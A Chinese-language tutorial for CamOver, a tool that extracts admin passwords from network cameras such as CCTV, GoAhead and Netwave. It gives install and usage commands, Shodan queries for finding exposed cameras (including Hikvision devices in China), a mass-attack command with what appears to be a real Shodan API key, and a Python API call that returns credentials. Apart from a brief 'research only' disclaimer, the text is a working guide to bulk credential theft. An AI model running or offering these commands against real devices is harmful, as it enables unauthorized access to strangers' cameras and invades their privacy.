描述
声明:文中所涉及的技术、思路和工具仅供以安全研究为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
CamOver 是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解网络摄像头的管理员密码,并且能与shodan 网络设备搜索引擎配合利用。
安装 Linux安装CamOver 由于 CamOver 使用 Python3 开发,因此首先需要在本地设备上安装并配置好 Python3 环境。
1 pip3 install git+https://github.com/EntySec/CamOver
功能特性
该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如 CCTV、GoAhead 和 Netwave 等。
经过优化,支持多线程同时攻击多个摄像头。
简单的命令行接口和 API 用法。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 root@kali:~ usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES] CamOver is a camera exploitation tool that allows to disclosure network camera admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye.
Shodan的基本使用 官网:shodan ,Shodan一些常用的语法;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 hostname:搜索指定的主机或域名。例如,hostname:"google" port:搜索指定的端口或服务。例如, port:"21" country:搜索指定的国家。例如, country:"CN" city:搜索指定的城市。例如,city:"Hefei" org:搜索指定的组织或公司。例如,org:"google" isp:搜索指定的ISP供应商。例如, isp:"China Telecom" product:搜索指定的操作系统/软件/平台。例如, product:"Apache httpd" version:搜索指定的软件版本。例如, version:"1.6.2" geo:搜索指定的地理位置,参数为经纬度。例如, geo:"31.8639,117.2808" before/after:搜索指定收录时间前后的数据,格式为 dd-mm-yy。例如, before:"11-09-19" net:搜索指定的IP地址或子网。例如,net:"210.45.240.0/24"
Shodan搜索例子 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 1、查找位于合肥的Apache服务器 apache city:"Hefei" 2、查找位于国内的Nginx服务器 nginx country:"CN" 3、查找GWS(Gogle Web Server)服务器 server: gws hostname:"google" 4、查找指定网段华为设备 huawei net:"64.191.146.0/24" 5、查找网络摄像头 webcam 6、查找国内的海康威视网络摄像头 Server: Hikvision-Webs country:"CN" 7、查找SQ-WEBCAM摄像头 Server: SQ-WEBCAM
使用 1.攻击单个摄像头;
1 camover -a xxx.xxx.xxx.xxx:port
2.通过网络攻击远程摄像头;
1 camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
使用浏览器访问;
3.从输入文件获取目标摄像头;
还可以使用开放数据库中提供的摄像头地址,使用 -t
参数来设置多线程数量以获得更好的性能:
1 camover -t -i cameras.txt -o passwords.txt
此命令将会攻击 cameras.txt 中给出的所有摄像头,并会将所有获取到的密码存储至 passwords.txt 文件中。
4.API的调用
CamOver 还提供了自己的 Python API ,可以将其导入至你们自己的项目代码中并调用其功能:
1 from camover import CamOver
调用样例,攻击单个摄像头:
1 2 3 4 5 6 7 from camover import CamOvercamover = CamOver() creds = camover.exploit('xxx.xxx.xxx.xxx:port' ) print (creds)